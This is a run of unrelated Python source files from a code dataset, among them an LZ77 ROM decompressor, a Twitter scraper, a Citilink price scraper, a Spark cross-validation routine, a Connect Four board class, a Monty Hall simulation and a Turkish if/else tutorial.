obj.reset()\n","sub_path":"py_gnome/tests/unit_tests/test_utilities/test_ordered_collection.py","file_name":"test_ordered_collection.py","file_ext":"py","file_size_in_byte":10346,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"534964402","text":"#!/usr/bin/python\r\n# coding: utf-8\r\n\r\nu\"\"\" LZ77 decompressor by ideal.exe\r\n\r\n LZ77圧縮されたデータを検索したり解凍するモジュールです.\r\n ファイル名と圧縮されたデータの開始アドレスを渡して実行すると解凍します.\r\n\"\"\"\r\n\r\n\r\nimport os\r\nimport re\r\nimport struct\r\nimport sys\r\nimport time\r\n\r\n\r\ndef detectLZ77(romData):\r\n u\"\"\"\r\n LZ77(0x10)圧縮されてそうなデータの検索\r\n\r\n \"\"\"\r\n\r\n minSize = 0x100 # bytes\r\n maxSize = 0x10000\r\n searchStep = 0x4\r\n\r\n matchList = []\r\n candidateIter = re.finditer(\"\\x10(?P...)\\x00\\x00(?P=size)\", romData) # LZ77圧縮データの先頭は10 XX YY ZZ 00 00 XX YY ZZになる\r\n for match in candidateIter:\r\n matchAddr = match.start()\r\n uncompSize = struct.unpack('l', romData[matchAddr+1 : matchAddr+4] + \"\\x00\")[0] # 次3バイトが展開後のサイズ(4バイトに合わせないとunpack出来ないので\"\\x00\"をつけている)\r\n # キリが良い位置にあってサイズが妥当なものを抽出\r\n if (matchAddr >= 0x600000 and matchAddr % searchStep == 0 and minSize <= uncompSize <= maxSize):\r\n print( hex(matchAddr) + \"\\t\" + str(uncompSize) + \" Bytes\" )\r\n matchList.append( {\"startAddr\":matchAddr, \"uncompSize\":uncompSize} )\r\n\r\n return matchList\r\n\r\n\r\ndef decompLZ77_10(data, startAddr):\r\n u\"\"\"\r\n LZ77(0x10)圧縮されたデータの復号\r\n 参考:http://florian.nouwt.com/wiki/index.php/LZ77_(Compression_Format)\r\n\r\n \"\"\"\r\n\r\n uncompSize = int.from_bytes(data[startAddr+1:startAddr+4], \"little\")\r\n\r\n def ascii2bit(a):\r\n u\"\"\"\r\n ASCII文字列を2進数文字列に変換(1文字8ケタ)\r\n ※現在未使用\r\n \"\"\"\r\n\r\n b = \"\"\r\n for c in list(a): # ASCII文字列の各文字に対して\r\n b += bin( struct.unpack(\"B\", c)[0] )[2:].zfill(8)\r\n return b\r\n\r\n def byte2bit(byte):\r\n u\"\"\" byte列を2進数文字列に変換(1バイト8ケタ)\r\n \"\"\"\r\n\r\n bit = \"\"\r\n\r\n if isinstance(byte, int):\r\n bit = bin(byte)[2:].zfill(8)\r\n else:\r\n for b in byte:\r\n bit += bin(b)[2:].zfill(8)\r\n return bit\r\n\r\n output = b\"\" # 復号結果を格納するバイト列\r\n writePos = 0 # 復号データの書き込み位置\r\n readPos = startAddr+4 # 圧縮データの読み取り開始位置\r\n\r\n while len(output) < uncompSize:\r\n currentChar = data[readPos] # ブロックヘッダ(1バイト)の読み込み\r\n blockHeader = byte2bit(currentChar) # ブロックヘッダを2進数文字列に変換\r\n for i in range(8): # 8ブロックで1セット\r\n if blockHeader[i] == str(0):\r\n u\"\"\"\r\n 非圧縮ブロックの処理\r\n\r\n \"\"\"\r\n readPos += 1 # 次の読み取り位置へ\r\n if readPos >= len(data): # ここ適当\r\n break\r\n currentChar = data[readPos:readPos+1] # 1バ��ト読み込み(data[readPos]だとbytes型ではなく整数値になる)\r\n output += currentChar # そのまま出力\r\n writePos += 1 # 次の書き込み位置へ\r\n else:\r\n u\"\"\"\r\n 圧縮ブロックの処理\r\n\r\n \"\"\"\r\n readPos += 2\r\n blockData = data[readPos-1:readPos+1] # 2バイトをブロック情報として読み込み\r\n blockData = byte2bit(blockData) # ブロック情報を2進数文字列に変換\r\n #print \"Block Data: \" + blockData\r\n\r\n offs = int(blockData[4:16], 2) + 1\r\n #print \"Backwards Offset: \" + str(offs) + \" bytes\"\r\n\r\n leng = int(blockData[0:4], 2) + 3\r\n #print \"Copy Length: \" + str(leng) + \" bytes\"\r\n currentChar = output[writePos - offs : writePos - offs + leng]\r\n if len(currentChar) < leng: # ここで引っかかった\r\n #print \"Block Data: \" + blockData\r\n #print \"Backwards Offset: \" + str(offs) + \" bytes\"\r\n #print \"Copy Length: \" + str(leng) + \" bytes\"\r\n # 存在する範囲を超えてコピーするときは直前のパターンを繰り返すことになる\r\n #currentChar = \"{0:{s}<{N}}\".format(currentChar, s=currentChar[0], N = leng)\r\n currentChar = currentChar * leng # ここ適当\r\n currentChar = currentChar[0:leng]\r\n #print binascii.hexlify(currentChar)\r\n #print currentChar\r\n #print binascii.hexlify(currentChar)\r\n output += currentChar\r\n writePos += leng # 書き込んだバイト数だけずらす\r\n readPos += 1\r\n\r\n output = output[0:uncompSize] # 必要な部分だけ切り出し\r\n return output\r\n\r\ndef saveFile(data, outName):\r\n u\"\"\" ファイル出力\r\n \"\"\"\r\n\r\n try:\r\n with open(outName, \"wb\") as outFile:\r\n outFile.write(data)\r\n except:\r\n print(u\"ファイルを正しく出力できませんでした\")\r\n\r\n\r\ndef main():\r\n startTime = time.time() # 実行時間計測開始\r\n\r\n # 引数が足りないよ!\r\n if len(sys.argv) < 3:\r\n print(u\"引数が足りません\")\r\n sys.exit()\r\n\r\n filePath = sys.argv[1] # 1つめの引数をファイルパスとして格納\r\n startAddr = int(sys.argv[2], 16)\r\n name, ext = os.path.splitext(filePath) # ファイル名と拡張子を取得\r\n outName = name + \"_\" + hex(startAddr) + \".bin\" # 出力ファイル名\r\n\r\n # ファイルを開く\r\n try:\r\n with open(filePath, 'rb') as romFile: # 読み取り専用、バイナリファイルとして開く\r\n romData = romFile.read() # データのバイナリ文字列(バイナリエディタのASCIIのとこみたいな感じ)\r\n size = len(romData) # ファイルサイズ\r\n print( str(size) + \" Bytes\" )\r\n except:\r\n print(u\"ファイルを開けませんでした\")\r\n\r\n output = decompLZ77_10(romData, startAddr)\r\n saveFile(output, outName)\r\n\r\n\r\n executionTime = time.time() - startTime # 実行時間計測終了\r\n print( \"Execution Time:\\t\" + str(executionTime) + \" sec\" )\r\n\r\n\r\nif __name__ == '__main__':\r\n main()\r\n","sub_path":"common/LZ77Util.py","file_name":"LZ77Util.py","file_ext":"py","file_size_in_byte":6527,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"125448121","text":"import tweepy\nimport csv\nfrom tokens import consumer_key, consumer_secret, access_token, access_token_secret\n\nauth = tweepy.OAuthHandler(consumer_key, consumer_secret)\nauth.set_access_token(access_token, access_token_secret)\napi = tweepy.API(auth,wait_on_rate_limit=True)\n# Open/Create a file to append data\ncsvFile = open('./mydata/test.csv', 'a')\n# Use csv Writer\ncsvWriter = csv.writer(csvFile)\n\nfor tweet in tweepy.Cursor(api.search,q=\"#Pfizer\",count=100,\n lang=\"en\",\n since=\"2021-05-11\",tweet_mode='extended').items():\n csvWriter.writerow([tweet.full_text.encode('utf-8'),tweet.retweet_count,tweet.user.followers_count,tweet.favorite_count,tweet.place,tweet.coordinates,tweet.geo,tweet.created_at])\nprint('Done!')","sub_path":"twitter_extract.py","file_name":"twitter_extract.py","file_ext":"py","file_size_in_byte":773,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"534063950","text":"import bs4\r\nimport re\r\nfrom lxml import etree\r\n\r\nfrom remote import request\r\nfrom api import deactivate, save, save_img, get_event_list\r\nfrom citilink import conf\r\n\r\n\r\ndef parse_category(url_category, replace_category, exists_goods):\r\n def check(_res):\r\n return bool(re.search('pageData = ', _res.text))\r\n\r\n cookies = _set_city()\r\n page = 1\r\n while True:\r\n url = 'http://www.citilink.ru/catalog/{category_p}?p={page_p}'\r\n res = request(\r\n url.format(category_p=url_category, page_p=page),\r\n id_client=conf.id_client,\r\n check_function=check,\r\n cookies=cookies,\r\n encoding=conf.encoding\r\n )\r\n if not res:\r\n return None\r\n\r\n bsoup = bs4.BeautifulSoup(res.text, 'html5lib')\r\n sub_category_list = bsoup.select('h2.category-content__title\" a')\r\n if len(sub_category_list) > 0:\r\n del bsoup\r\n\r\n for sub_category in sub_category_list:\r\n id_subcategory = re.search('catalog/(.+)$', sub_category['href'])\r\n if id_subcategory is not None:\r\n parse_category(id_subcategory.group(1), replace_category, exists_goods)\r\n\r\n return None\r\n\r\n for good in bsoup.select('.prices .special'):\r\n # рассчитаем процент скидки, если меньше 5, берем следующий товар\r\n old_price = good.find_parent('div', {\r\n 'class': 'prices'\r\n }).select_one('.standart .num')\r\n price = good.select_one('.num')\r\n if old_price is None or price is None:\r\n continue\r\n\r\n percent = 100 - (int(price.text.replace(' ', '')) / (int(old_price.text.replace(' ', '')) / 100))\r\n if round(percent) < 5:\r\n continue\r\n\r\n parent = good.find_parent('tbody', {\r\n 'class': 'product_data__gtm-js',\r\n })\r\n link = parent.select_one('.product_name a.link_gtm-js')\r\n id_good = re.search('/(\\d+)/$', link['href'])\r\n if id_good is None:\r\n continue\r\n\r\n data = {\r\n 'id_client': conf.id_client,\r\n 'id_category': replace_category[0],\r\n 'id_sub_category': replace_category[1],\r\n 'old_price': old_price.text.replace(' ', ''),\r\n 'current_price': price.text.replace(' ', ''),\r\n }\r\n if parse_good(id_good.group(1), data):\r\n exists_goods.append(id_good.group(1))\r\n\r\n next_page = bsoup.select_one('.page_listing li.next')\r\n if next_page is None:\r\n break\r\n\r\n page += 1\r\n\r\n\r\ndef parse_good(id_good, data):\r\n def check(_res):\r\n return bool(re.search('\"pageType\":\"ProductPage\"', _res.text))\r\n\r\n cookies = _set_city()\r\n url = 'http://www.citilink.ru/catalog/{id_p}/'.format(id_p=id_good)\r\n res = request(\r\n url,\r\n id_client=conf.id_client,\r\n check_function=check,\r\n cookies=cookies,\r\n encoding=conf.encoding\r\n )\r\n if not res:\r\n return None\r\n\r\n avail = re.search('\"productAvailability\":\"available\"', res.text)\r\n if avail is None:\r\n return None\r\n\r\n bsoup = bs4.BeautifulSoup(res.text, 'html5lib')\r\n\r\n data['link'] = url\r\n data['name'] = list(bsoup.select_one('.product_header h1').stripped_strings)[1]\r\n data['description'] = bsoup.select_one('.short_description').getText(strip=True)\r\n\r\n save_res = save(data)\r\n if not save_res:\r\n return None\r\n\r\n img_count = 0\r\n for photo in bsoup.select('.image_gallery li.photo_carousel__js a'):\r\n if img_count > 4:\r\n break\r\n\r\n img = request(photo['href'], stream=True, use_proxy=False)\r\n if not img:\r\n continue\r\n img_count += 1\r\n\r\n import tempfile\r\n with tempfile.NamedTemporaryFile() as f:\r\n for chunk in img.iter_content(1024):\r\n f.write(chunk)\r\n\r\n f.seek(0, 0)\r\n save_img(conf.id_client, img_count, save_res['response']['id_event'], f)\r\n\r\n return True\r\n\r\n\r\ndef check_activity(id_good):\r\n def check(_res):\r\n return bool(re.search('\"pageType\":\"ProductPage\"', _res.text))\r\n\r\n cookies = _set_city()\r\n res = request(\r\n 'http://www.citilink.ru/catalog/{id_p}/'.format(id_p=id_good),\r\n id_client=conf.id_client,\r\n check_function=check,\r\n cookies=cookies,\r\n encoding=conf.encoding\r\n )\r\n if not res:\r\n return None\r\n\r\n avail = re.search('\"productAvailability\":\"available\"', res.text)\r\n price = re.search('line-block club_price', res.text)\r\n if avail is None or price is None:\r\n return False\r\n\r\n html = etree.HTML(res.text)\r\n price = html.xpath(\"//div[@class='line-block club_price']//div[@class='price_block']//ins[@class='num']\")\r\n old_price = html.xpath(\"//div[contains(@class, 'standart_price')]/span[@class='price']/ins[@class='num']\")\r\n if len(price) > 0 and len(old_price) > 0:\r\n percent = 100 - (int(price[0].text.replace(' ', '')) / (int(old_price[0].text.replace(' ', '')) / 100))\r\n return round(percent) >= 5\r\n\r\n return False\r\n\r\n\r\ndef research():\r\n exists_goods = []\r\n\r\n # Полчим список всех существующих акций текущего сайта\r\n event_list = get_event_list(conf.id_client, conf.domain)\r\n if event_list is not None:\r\n for event in event_list['response']['events']:\r\n id_good = re.search('/(\\d+)/$', event['link'])\r\n is_active = check_activity(id_good.group(1))\r\n if is_active is not None and is_active:\r\n exists_goods.append(id_good.group(1))\r\n\r\n elif is_active is not None and not is_active:\r\n deactivate(conf.id_client, event['id'])\r\n\r\n return exists_goods\r\n\r\n\r\ndef start():\r\n exists_goods = research()\r\n\r\n for id_category in conf.category_replace:\r\n if id_category is not None and conf.category_replace[id_category] is not None:\r\n parse_category(id_category, conf.category_replace[id_category], exists_goods)\r\n\r\n\r\ndef _set_city():\r\n return {\r\n '_space': conf.id_city,\r\n }\r\n","sub_path":"robots/parser/citilink/grabber.py","file_name":"grabber.py","file_ext":"py","file_size_in_byte":6272,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"186844872","text":"def CrossValidation(k):\n countexcess={}\n countunder={}\n #Split the training data into k folds(train is the complete training data)\n trainint=(train.coalesce(k,shuffle=True).glom().collect())\n newfolds=[]\n excess=[]\n nSamplesinfold=len(train)/k\n#This code snippet ensures that each fold contains equal number of examples(nSamplesinfold here)\n for i,val in enumerate(trainint):\n if len(val)-nSamplesinfold>0:\n countexcess[i]=len(val)-nSamplesinfold\n trainint[i]=val[countexcess[i]:]\n excess.append(val[:countexcess[i]+1])\n else:\n countunder[i]=nSamplesinfold-len(val)\n excess=list(itertools.chain(*excess))\n for key,value in countunder.items():\n ex=excess[:value]\n trainint[key].extend(ex)\n accuracy_nb_val=[]\n accuracy_nb_test=[]\n for i in range(0,k):\n print (\"Iteration no. {}\".format(i+1))\n#Ensures that one fold is used for validation and others are used for training(without replacement i.e one fold which was earlier \n#used for validation is never used again) \n val=trainint[i]\n train2=trainint[:i]\n train2.extend(trainint[i+1:])\n train21=list(itertools.chain(*train2))\n#form the training and validation data\n train=sc.parallelize(train21)\n validation=sc.parallelize(val)\n hashingTF = HashingTF()\n#Feature Extraction for training data\n tf_train = train.map(lambda tup: hashingTF.transform(tup[1]))\n idf_train = IDF().fit(tf_train)\n tfidf_train = idf_train.transform(tf_train)\n#feature Extraction for Validation Data\n tf_val = validation.map(lambda tup: hashingTF.transform(tup[1]))\n idf_val = IDF().fit(tf_val)\n tfidf_val = idf_train.transform(tf_val)\n#Feature Extraction for test data\n tf_test = test.map(lambda tup: hashingTF.transform(tup[1]))\n idf_test = IDF().fit(tf_test)\n tfidf_test = idf_test.transform(tf_test)\n#Labeled Data for training data\n labels=train.map(lambda x:x[0])\n transformeddata=labels.zip(tfidf_train)\n labeled1_train = transformeddata.map(lambda k: LabeledPoint(k[0], k[1]))\n#Labeled Data for validation data\n labelsval=validation.map(lambda x:x[0])\n transformedvaldata=labelsval.zip(tfidf_val)\n labeled1_val = transformedvaldata.map(lambda k: LabeledPoint(k[0], k[1]))\n#Labeled Data for Test Data\n labelstest=test.map(lambda x:x[0])\n transformeddatatest=labelstest.zip(tfidf_test)\n labeled1_test = transformeddatatest.map(lambda k: LabeledPoint(k[0], k[1]))\n model = NaiveBayes.train(labeled1_train, 1.0)\n predictionAndLabelval = labeled1_val.map(lambda p: (model.predict(p.features), p.label))\n accuracyval = 1.0 * predictionAndLabelval.filter(lambda x: x[0] == x[1]).count() / validation.count()\n print('model Validation accuracy for Naive Bayes{}'.format(accuracyval))\n accuracy_nb_val.append(accuracyval)\n predictionAndLabeltest = labeled1_test.map(lambda p: (model.predict(p.features), p.label))\n accuracytest = 1.0 * predictionAndLabeltest.filter(lambda x: x[0] == x[1]).count() / test.count()\n print('model test accuracy for Naive Bayes{}'.format(accuracytest))\n accuracy_nb_test.append(accuracytest)\n\n\n","sub_path":"crossvalidationcompletefornb.py","file_name":"crossvalidationcompletefornb.py","file_ext":"py","file_size_in_byte":3186,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"408735111","text":"from datetime import date\nfrom django.core.exceptions import ValidationError\nfrom django.test.testcases import TestCase\n\nfrom EC.tests.models import Test\nfrom ecweb.models import ClassRoom, Student, BasicUser\n\n\nclass TestModelTest(TestCase):\n def setUp(self):\n self.cr = ClassRoom.objects.create(number_class=1, level='Beginner', turn='morning',)\n\n u1 = BasicUser.objects.create_superuser(\n username='user',\n password='pass',\n email=\"user1@mail.com\"\n )\n\n u2 = BasicUser.objects.create_superuser(\n username='user',\n password='pass',\n email=\"user2@mail.com\"\n )\n\n s1 = Student.objects.create(user=u1, cod=1, type_of_course='1-month')\n s2 = Student.objects.create(user=u2, cod=2, type_of_course='1-month')\n\n self.obj = Test.objects.create(\n classroom=self.cr,\n date=date(2018, 1, 7),\n type=Test.LISTENING,\n )\n self.obj.attendances.add(s1)\n self.obj.attendances.add(s2)\n\n def test_create(self):\n self.assertTrue(Test.objects.exists())\n\n def test_str(self):\n obj_str = f'2018-01-07: {Test.LISTENING}'\n self.assertEqual(obj_str, str(self.obj))\n\n def test_choices(self):\n \"\"\"Test type should be limited to listening or reading\"\"\"\n test = Test(\n classroom=self.cr,\n date=date(2018, 1, 7),\n type='writing'\n )\n\n self.assertRaises(ValidationError, test.full_clean)\n\n def test_has_attendances(self):\n test = Test.objects.first()\n self.assertTrue(test.attendances.exists())","sub_path":"EC/tests/tests/test_model_test.py","file_name":"test_model_test.py","file_ext":"py","file_size_in_byte":1646,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"160772304","text":"class PpiData:\n def __init__(self, train_adj, val_adj, test_adj, train_feat, val_feat, test_feat, train_labels, val_labels,\n test_labels, train_nodes, val_nodes, test_nodes, tr_msk, vl_msk, ts_msk):\n self.train_adj = train_adj\n self.val_adj = val_adj\n self.test_adj = test_adj\n self.train_feat = train_feat\n self.val_feat = val_feat\n self.test_feat = test_feat\n self.train_labels = train_labels\n self.val_labels = val_labels\n self.test_labels = test_labels\n self.train_nodes = train_nodes\n self.val_nodes = val_nodes\n self.test_nodes = test_nodes\n self.tr_msk = tr_msk\n self.vl_msk = vl_msk\n self.ts_msk = ts_msk\n\n def to_device(self, device=None):\n raise NotImplementedError()\n\n def save(self, path='./data'):\n raise NotImplementedError()\n","sub_path":"utils/ppi_data.py","file_name":"ppi_data.py","file_ext":"py","file_size_in_byte":884,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"553083885","text":"\nfrom manualcontrolmultitasks import ManualControlMulti\nfrom riglib.stereo_opengl.window import WindowDispl2D\n#from bmimultitasks import BMIControlMulti\nimport pygame\nimport numpy as np\nimport copy\n\n#from riglib.bmi.extractor import DummyExtractor\n#from riglib.bmi.state_space_models import StateSpaceEndptVel2D\n#from riglib.bmi.bmi import Decoder, BMISystem, GaussianStateHMM, BMILoop, GaussianState, MachineOnlyFilter\nfrom riglib import experiment\nfrom features.hdf_features import SaveHDF\n\nclass CursorControl(ManualControlMulti, WindowDispl2D):\n '''\n this class implements a python cursor control task for human\n '''\n\n def __init__(self, *args, **kwargs):\n # just run the parent ManualControlMulti's initialization\n self.move_step = 1\n\n # Initialize target location variable\n #target location and index have been initializd\n\n super(CursorControl, self).__init__(*args, **kwargs)\n\n def init(self):\n pygame.init()\n\n \n\n self.assist_level = (0, 0)\n super(CursorControl, self).init()\n\n # override the _cycle function\n def _cycle(self):\n #print(self.state)\n\n #target and plant data have been saved in\n #the parent manualcontrolmultitasks\n\n self.move_effector_cursor()\n super(CursorControl, self)._cycle()\n\n # do nothing\n def move_effector(self):\n pass\n\n def move_plant(self, **kwargs):\n pass\n\n # use keyboard to control the task\n def move_effector_cursor(self):\n np.array([0., 0., 0.])\n curr_pos = copy.deepcopy(self.plant.get_endpoint_pos())\n\n for event in pygame.event.get():\n if event.type == pygame.KEYUP:\n if event.type == pygame.K_q:\n pygame.quit()\n quit()\n if event.key == pygame.K_LEFT:\n curr_pos[0] -= self.move_step\n if event.key == pygame.K_RIGHT:\n curr_pos[0] += self.move_step\n if event.key == pygame.K_UP:\n curr_pos[2] += self.move_step\n if event.key == pygame.K_DOWN:\n curr_pos[2] -= self.move_step\n #print('Current position: ')\n #print(curr_pos)\n\n # set the current position\n self.plant.set_endpoint_pos(curr_pos)\n\n def _start_wait(self):\n self.wait_time = 0.\n super(CursorControl, self)._start_wait()\n\n def _test_start_trial(self, ts):\n return ts > self.wait_time and not self.pause\n\n#this task can be run on its\n#we will not involve database at this time\ntarget_pos_radius = 10\n\ndef target_seq_generator(n_targs, n_trials):\n #generate targets\n angles = np.transpose(np.arange(0,2*np.pi,2*np.pi / n_targs))\n unit_targets = targets = np.stack((np.cos(angles), np.sin(angles)),1)\n targets = unit_targets * target_pos_radius\n\n center = np.array((0,0))\n\n target_inds = np.random.randint(0, n_targs, n_trials)\n target_inds[0:n_targs] = np.arange(min(n_targs, n_trials))\n\n k = 0\n while k < n_trials:\n targ = targets[target_inds[k], :]\n yield np.array([[center[0], 0, center[1]],\n [targ[0], 0, targ[1]]])\n k += 1\n\n\nif __name__ == \"__main__\":\n print('Remember to set window size in stereoOpenGL class')\n gen = target_seq_generator(8, 1000)\n\n #incorporate the saveHDF feature by blending code\n #see tests\\start_From_cmd_line_sim\n \n base_class = CursorControl\n feats = [SaveHDF]\n Exp = experiment.make(base_class, feats=feats)\n print(Exp)\n\n exp = Exp(gen)\n exp.init()\n exp.run() #start the task\n \n\n\n ","sub_path":"built_in_tasks/cursorControlTasks_saveHDF.py","file_name":"cursorControlTasks_saveHDF.py","file_ext":"py","file_size_in_byte":3655,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"538295948","text":"# -*- coding: utf-8 -*-\n# @Time : 2018/4/16 17:22\n# @Author : DGG\n# @Site : \n# @File : captcha.py\n# @Software: PyCharm\nimport time\nimport urllib.parse\nimport hashlib\nimport base64\nimport requests\nimport json\n\n#获取签名\ndef get_request_sign(user_parms={}):\n default_parms = {\n 'app_id' : '1106681869',\n 'time_stamp' : int(time.time()),\n 'nonce_str' : 'fa577ce340859f9fe'\n }\n app_key = 'eW57iuWa7HkpOcFM'\n parms = dict(default_parms,**user_parms)\n\n sort_parms = sorted(parms.items(),key=lambda item:item[0])\n\n str_parms = urllib.parse.urlencode(dict(sort_parms))\n\n appKey_parms = str_parms + '&app_key=' + app_key\n hd5 = hashlib.md5(appKey_parms.encode(\"utf-8\"))\n sign = hd5.hexdigest().upper()\n parms['sign'] = sign\n return parms\n\n\nwith open('images/imgNum.jpg','rb') as f:\n img = base64.b64encode(f.read())\n data = get_request_sign({'image':img})\n res = requests.post('https://api.ai.qq.com/fcgi-bin/ocr/ocr_generalocr',data=data)\n print(res.json())\n\n\n","sub_path":"tenxun_ai.py","file_name":"tenxun_ai.py","file_ext":"py","file_size_in_byte":1032,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"314079506","text":"\n# Takes a number, tests if it works, adds it to board, reports back if it's a win\n# Error list:\n# 1 = move not an int\n# 2 = move not between 1 - 7\n# 3 = no spot available\n\nclass Board():\n def __init__(self):\n self.board_dict = {1:'.', 2:'.', 3:'.', 4:'.', 5:'.', 6:'.', 7:'.', 8:'.', 9:'.', 10:'.', 11:'.', 12:'.', 13:'.', 14:'.', 15:'.', 16:'.', 17:'.', 18:'.', 19:'.', 20:'.', 21:'.', 22:'.', 23:'.', 24:'.', 25:'.', 26:'.', 27:'.', 28:'.', 29:'.', 30:'.', 31:'.', 32:'.', 33:'.', 34:'.', 35:'.', 36:'.', 37:'.', 38:'.', 39:'.', 40:'.', 41:'.', 42:'.'}\n self.move_list = []\n self.error = 0\n self.turn_count = 0\n\n def print_board(self):\n i = 36\n print(\"\")\n while i > 0:\n print(self.board_dict[i], end =\"\")\n if i % 7 == 0 and i != 36:\n print(\"\")\n i -= 14\n i += 1\n print(\"\")\n\n def is_error(self, move):\n # Make sure move is an INT\n try:\n int(move)\n except:\n error = 1\n return error\n # Makes sure move is between 1-7\n if 1 > move or move > 7 :\n error = 2\n return error\n # Make sure move is still on the board\n i = 0\n while move in self.move_list:\n move += 7\n i += 1\n if i > 5:\n error = 3\n return error\n pass\n else:\n error = self.error\n return error\n\n def board_move(self, move, player_piece):\n move = int(move)\n\n while self.board_dict[move] != '.':\n move +=7\n if move > 42:\n break\n\n # while move in self.move_list:\n # move += 7\n\n self.board_dict[move] = player_piece\n self.move_list.append(move)\n self.turn_count += 1\n\n return self.board_dict\n\n def is_win(self):\n game_won = False\n # A = Horizontal, B = Vertical, C = Diagonal Right, D = Diagonal Left\n win_possibilities = [\"A\", \"B\", \"C\", \"D\"]\n # Wincomb_dict Structure = [[starting moves], [add number, how many iterations on current row], [add number to get to next row, how many rows to try]]\n wincomb_dict = {'A': [[1,2,3,4], [1,4], [7,6]], 'B': [[1,8,15,22],[7,3],[1,7]], 'C': [[1,9,17,25],[1,4],[7,3]], 'D': [[4,10,16,22],[1,4],[7,3]]}\n for wp in win_possibilities:\n y = 0\n for j in range(wincomb_dict[wp][2][1]):\n x = 0\n for i in range(wincomb_dict[wp][1][1]):\n if self.board_dict[wincomb_dict[wp][0][0]+x+y] == self.board_dict[wincomb_dict[wp][0][1]+x+y] == self.board_dict[wincomb_dict[wp][0][2]+x+y] == self.board_dict[wincomb_dict[wp][0][3]+x+y] != '.':\n game_won = True\n # To print cause of victory:\n # print(wp)\n return game_won\n x = x + wincomb_dict[wp][1][0]\n y = y + wincomb_dict[wp][2][0]\n return game_won\n\n def take_back(self):\n last_move = self.move_list[-1]\n self.board_dict[last_move] = '.'\n del self.move_list[-1]\n","sub_path":"old_version/Archive/board_class.py","file_name":"board_class.py","file_ext":"py","file_size_in_byte":3200,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"293966735","text":"#Gabriel Oliveira Borges, RA:197458, Ciência da Computação 018\n#Nota: A professora disse durante a aula de quinta-feira (21/03) que não seria preciso usar o jupyter notebook\n\nimport random\nimport matplotlib.pyplot as plt; plt.rcdefaults()\nimport matplotlib.pyplot as plt\nimport numpy as np\n\nqtdJogos = 100000\n\ndef tiraUm(palpite, correto, portas):\n for i in portas:\n if i != correto and i != palpite:\n return i\n\ndef escolhePorta(portas):\n return random.randint(1, len(portas))\n\ndef mudaPorta(palpite, portas):\n for i in portas:\n if i != palpite:\n return i\n\ndef montaGrafico(naoMudou, mudou):\n n_groups = 2\n \n #create plot\n ax = plt.subplots()\n index = np.arange(n_groups)\n barWidth = 0.35\n opacity = 0.8\n\n rects1 = plt.bar(index, mudou, barWidth, alpha = opacity, color = 'b', label = 'Acertou')\n rects2 = plt.bar(index + barWidth, naoMudou, barWidth, alpha = opacity, color = 'g', label = 'Errou')\n\n\n plt.ylabel('Porcentagem\\n(%)')\n plt.title('Porcentagem de acertos e erros no jogo das portas. \\nForam realizados {} jogos'.format(qtdJogos))\n plt.xticks(index + barWidth/2, ('Manteve porta', 'Mudou de porta'))\n plt.legend()\n\n plt.tight_layout()\n\n plt.show()\n\ndef main():\n print('Fazendo simulações')\n qtdAcertos = 0\n qtdErros = 0\n\n #nao muda\n for i in range(qtdJogos):\n portas = [1, 2, 3]\n palpite = escolhePorta(portas)\n correto = escolhePorta(portas)\n portas.remove(tiraUm(palpite, correto, portas))\n if palpite == correto:\n qtdAcertos += 1\n else:\n qtdErros += 1\n\n qtdAcertosMuda = 0\n qtdErrosMuda = 0\n #muda\n for i in range(qtdJogos):\n portas = [1, 2, 3]\n palpite = escolhePorta(portas)\n correto = escolhePorta(portas)\n portas.remove(tiraUm(palpite, correto, portas))\n palpite = mudaPorta(palpite, portas)\n if palpite == correto:\n qtdAcertosMuda += 1\n else:\n qtdErrosMuda += 1\n \n\n montaGrafico((qtdAcertosMuda*100/qtdJogos, qtdErrosMuda*100/qtdJogos), (qtdAcertos*100/qtdJogos, qtdErros*100/qtdJogos))\n\n\nmain()\n\n\n\n\n\n","sub_path":"programaprob.py","file_name":"programaprob.py","file_ext":"py","file_size_in_byte":2186,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"305604466","text":"def answer(population, x, y, strength):\n if population[y][x] > strength:\n return population\n infect_list = [(y, x)]\n for tup in infect_list:\n i = tup[0]\n j = tup[1]\n if population[i][j] <= strength:\n population[i][j] = -1\n if i-1 >= 0 and population[i - 1][j] != -1 and population[i - 1][j] <= strength:\n if (i - 1, j) not in infect_list: infect_list.append((i - 1, j))\n if i+1 < len(population) and population[i + 1][j] != -1 and population[i + 1][j] <= strength:\n if (i + 1, j) not in infect_list: infect_list.append((i + 1, j))\n if j-1 >= 0 and population[i][j - 1] != -1 and population[i][j - 1] <= strength:\n if (i, j - 1) not in infect_list: infect_list.append((i, j - 1))\n if j+1 < len(population[i]) and population[i][j + 1] != -1 and population[i][j + 1] <= strength:\n if (i, j + 1) not in infect_list: infect_list.append((i, j + 1))\n return population\n\n\nprint(answer([[6, 7, 2, 7, 6], [6, 3, 1, 4, 7], [0, 2, 4, 1, 10], [8, 1, 1, 4, 9], [8, 7, 4, 9, 9]],1,2,5))\n\n","sub_path":"zombit_infection.py","file_name":"zombit_infection.py","file_ext":"py","file_size_in_byte":1096,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"554562381","text":"\"\"\"\nif else koşulları\n\"\"\"\nkosul=False;\nif (kosul):\n print(\"koşul doğru\")\nelse:\n print(\"koşul yanlış\")\n\nyas=int(input(\"yaşını gir.. \"))\nif yas > 18:\n print(\"hoşgeldin\")\nelse:\n print(\"yaş doğrulanmadı\")\n\na=3\nb=5\nc=8\n\nsecim=input(\"secim yapınız {a b c}.. \")\nif(secim == \"a\"):\n print(a)\nelif(secim == \"b\"):\n print(b)\nelif(secim == \"c\"):\n print(c)\n 